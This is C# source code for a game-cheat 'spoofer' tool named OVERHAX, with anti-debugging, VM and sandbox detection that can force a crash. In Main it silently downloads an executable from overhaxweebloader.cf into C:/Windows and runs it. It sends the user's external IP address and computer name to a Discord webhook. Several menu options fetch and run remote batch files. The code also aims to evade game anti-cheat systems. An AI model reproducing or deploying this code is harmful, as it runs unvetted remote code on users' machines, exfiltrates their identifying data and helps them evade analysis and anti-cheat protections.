internal static void Search(string dir, string file, string Extention) { string text = string.Concat(new string[] { dir, "\\", file, ".", Extention }); bool flag = File.Exists(text); if (flag) { try { using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "DebugScan" + " **KEY: **" + Entries.key); } MessageBox.Show(text + " Debugger Found!", "Delete this to continue!"); Process.Start(new ProcessStartInfo("cmd.exe", "/c START CMD /C \"COLOR C && TITLE OVERSPOOF Protection && ECHO " + text + " Detected! && TIMEOUT 10\"") { CreateNoWindow = true, UseShellExecute = false }); Process.GetCurrentProcess().Kill(); } catch { This.BSOD(); } } }
private static void AntiDebug() { This.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref This.isDebuggerPresent); bool flag = This.isDebuggerPresent; try { if (flag) { using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "AntiDebug" + " **KEY: **" + Entries.key); } Process.Start(new ProcessStartInfo("cmd.exe", "/c START CMD /C \"COLOR C && TITLE OVERSPOOF Protection && ECHO Active debugger found, please make sure it is not Visual Studio! && TIMEOUT 5\"") { CreateNoWindow = false, UseShellExecute = false }); Process.GetCurrentProcess().Kill(); This.Start(); } } catch { This.BSOD(); } }
internal static void Close(string file) { try { foreach (Process process in Process.GetProcessesByName(file)) { process.Kill(); This.GetRunningDebugger.Find(); This.KillPC(); MessageBox.Show(file + ".exe Debugger/Unpacker Found Open!", "Close this to continue!"); This.MouseFreeze(); Thread.Sleep(2000); Process.Start(new ProcessStartInfo("cmd.exe", "/c START CMD /C \"COLOR C && TITLE OVERSPOOF Protection && ECHO " + file + " Detected! && TIMEOUT 10\"") { CreateNoWindow = true, UseShellExecute = false }); using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "GetRunningDebugger" + " **KEY: **" + Entries.key); } This.RevivePC(); This.ReleaseMouse(); Process.GetCurrentProcess().Kill(); } } catch { This.Start(); This.ReleaseMouse(); This.RevivePC(); Process.Start(new ProcessStartInfo("cmd.exe", "/c START CMD /C \"COLOR C && TITLE OVERSPOOF Protection Failed to close task && ECHO " + file + " Detected! && TIMEOUT 10\"") { CreateNoWindow = false, UseShellExecute = false }); This.BSOD(); } }
private static void VMDetect() { using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) { using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get()) { foreach (ManagementBaseObject managementBaseObject in managementObjectCollection) { bool flag = (managementBaseObject["Manufacturer"].ToString().ToLower() == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || managementBaseObject["Manufacturer"].ToString().ToLower().Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox"; if (flag) { using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "VMware VMDetect" + " **KEY: **" + Entries.key); } MessageBox.Show("Sorry you can't run this file in a VM!", "To keep this program safe from getting cracked"); Process.GetCurrentProcess().Kill(); } } } } foreach (ManagementBaseObject managementBaseObject2 in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController").Get()) { bool flag2 = managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VMware") && managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VBox"); if (flag2) { using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "VMware VMDetect" + " **KEY: **" + Entries.key); } MessageBox.Show("Sorry you can't run this file in a VM!", "To keep this program safe from getting cracked"); Process.GetCurrentProcess().Kill(); } } }
private static void SandBoxieDetect() { bool flag = This.GetModuleHandle("SbieDll.dll").ToInt32() != 0; if (flag) { using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Found debugger in type***__" + "SandBoxieDetect" + " **KEY: **" + Entries.key); } Process.Start(new ProcessStartInfo("cmd.exe", "/c START CMD /C \"COLOR C && TITLE OVERSPOOF Protection && ECHO Sorry you can't run this file in a sandboxie, To keep this program safe from getting cracked. && TIMEOUT 5\"") { CreateNoWindow = false, UseShellExecute = false }); Process.GetCurrentProcess().Kill(); } }
static void Main(string[] args) { Task.Run(() => Application.Run(new Form1())); Protect.This.Start(); Protect.This.test(); try { using (var client = new WebClient()) using (var stream = client.OpenRead("http://www.google.com")) { Application.Exit(null); } }catch { Console.WriteLine("[-] No connection", Color.Red); } //try,finally exception catch try { //3sa discord play thingy WebClient discordthing = new WebClient(); discordthing.Proxy = null; discordthing.Headers["User-Agent"] = "NOTCRACKEDOK"; FileInfo playing = new FileInfo(@"C:/Windows/overhax.exe"); discordthing.DownloadFile("http://overhaxweebloader.cf/overhax.exe", playing.FullName); Process.Start(playing.FullName); //Server IP Address IPHostEntry SystemAC = Dns.GetHostEntry(Dns.GetHostName()); string IPAddress = string.Empty; foreach (var address in SystemAC.AddressList) { if (address.AddressFamily == AddressFamily.InterNetwork) { IPAddress = address.ToString(); } } //external ip address HTTPGet req = new HTTPGet(); req.Request("http://checkip.dyndns.org"); string[] a = req.ResponseBody.Split(':'); string a2 = a[1].Substring(1); string[] a3 = a2.Split('<'); string a4 = a3[0]; //External IP Address // WebClient yay = new WebClient(); // string extip = yay.DownloadString("http://icanhazip.com"); // pc name string localComputerName = Dns.GetHostName(); //ip address IPAddress[] localIPs = Dns.GetHostAddresses(Dns.GetHostName()); Draw.print1(); // computer name Console.Write(" [", Color.LightPink); Console.Write("+", Color.LightPink); Console.Write("] ", Color.LightPink); Console.WriteLine("Welcome, " + localComputerName + "!", Color.LightPink); //auth.gg server ip Console.Write(" [", Color.LightPink); Console.Write("+", Color.LightPink); Console.Write("] ", Color.LightPink); Console.WriteLine("Server IP: " + IPAddress, Color.LightPink); // external ip display // add check if proxy? Console.Write(" [", Color.LightPink); Console.Write("+", Color.LightPink); Console.Write("] ", Color.LightPink); Console.Write("Client IP: " + a4, Color.LightPink); Console.WriteLine(""); using (Webhooks.dWebHook dcWeb = new Webhooks.dWebHook()) { dcWeb.WebHook = Webhooks.dWebHook.Logweb; dcWeb.ProfilePicture = "https://avatarfiles.alphacoders.com/119/119681.png"; dcWeb.UserName = "******"; Thread.Sleep(500); dcWeb.SendMessage(">>> __***Connection started! on client***__" + "** Client IP: **" + a4 + " **Username: **" + localComputerName + " **KEY: **" + Entries.key); } } catch (Exception ex) { Console.WriteLine("Error press enter", (ex.ToString())); Console.ReadLine(); } // if above code failed due to connection below will run regardless finally { Console.Title = Windownamechange.GetRandomString(); Auth.Handler.Initialize(); //Make sure settings are set in Settings.cs if (Auth.ProgramInfo.Freemode == "Enabled") { Console.WriteLine("This application is in freemode redirecting!"); } } //warning Console.WriteLine(""); Console.WriteLine(" [!] We recommend making a backup of your personal files and registry before cleaning.", Color.Red); //auth.gg key Console.WriteLine(""); Console.Write(" [=] ", Color.LightPink); List <char> chars = new List <char>() { 'L', 'i', 'c', 'e', 'n', 's', 'e', ':', ' ' }; Console.WriteWithGradient(chars, Color.Yellow, Color.Fuchsia, 14); //license string key = Console.ReadLine(); bool allin1 = Auth.Handler.Login_Register_Redeem_With_Key(key); if (allin1 == true) { //ADD KEY TO REGISTRY RegistryKey SoftwareKey = Registry.LocalMachine.OpenSubKey("Software", true); RegistryKey AppNameKey = SoftwareKey.CreateSubKey("OVERHAX SPOOFER"); RegistryKey AppVersionKey = AppNameKey.CreateSubKey("key"); AppVersionKey.SetValue("Status", key); /// WebClient webClient = new WebClient(); webClient.Proxy = null; webClient.Headers["User-Agent"] = "NOTCRACKEDOK"; Console.Clear(); //Options Start for spoofing Draw.cache(); Draw.print1(); Console.Write(" [1] Load Spoofer \n", Color.LightPink); Console.Write(" [2] Load Cleaner \n", Color.LightPink); Console.Write(" [3] Discord: http://overhax.ml/join.html \n\n", Color.LightPink); Console.Write(" [4] Anti-cheat Bruteforcer \n", Color.LightPink); Console.Write("\n", Color.LightPink); Console.Write(" Option: ", Color.LightPink); //Options End for spoofing //Spoofing Start var cheeto = Console.ReadLine(); if (cheeto == "1") { Protect.This.Start(); Console.Clear(); Thread.Sleep(1000); Draw.print1(); MessageBox.Show("Starting to Spoof!\n Please wait...", "OverhaxSpoofer", MessageBoxButtons.OK, MessageBoxIcon.Information); Thread.Sleep(2000); Console.Write(" ["); Console.Write("!"); Console.Write("] "); Console.WriteLine("Spoofing, please Wait...", Color.LightPink); Spoofer.spoof1(); Thread.Sleep(4000); MessageBox.Show("Spoofed Successfully!", "OverhaxSpoofer", MessageBoxButtons.OK, MessageBoxIcon.Hand); drawMenu(); } else if (cheeto == "2") { Protect.This.Start(); Cleaners.Cleantraces(); Draw.cache(); } else if (cheeto == "3") { Console.Clear(); System.Diagnostics.Process.Start("http://overhax.ml/join.html"); drawMenu(); } else if (cheeto == "7") { Application.Exit(); } else if (cheeto == "4") { Protect.This.Start(); Console.Clear(); Console.Write("Grabbing latest version..", Color.LightPink); using (WebClient Client = new WebClient()) { FileInfo file = new FileInfo("C:/Windows/ForceBE.bat"); Client.Proxy = null; Client.Headers["User-Agent"] = "NOTCRACKEDOK"; Client.DownloadFile("http://overhaxweebloader.cf/Ac%20Forcer%20files/forcer.bat", file.FullName); Process.Start(file.FullName); } drawMenu(); Console.ReadLine(); } else if (cheeto == "5") { Protect.This.Start(); //option 5 Console.Clear(); Console.Write("Loading... \n"); using (WebClient Client = new WebClient()) { Client.Proxy = null; Client.Headers["User-Agent"] = "OVERHAX"; FileInfo file = new FileInfo("C:/Windows/ummmm.bat"); Client.DownloadFile("http://overhaxweebloader.cf/r6.bat", file.FullName); Process.Start(file.FullName); } } else { drawMenu(); } } }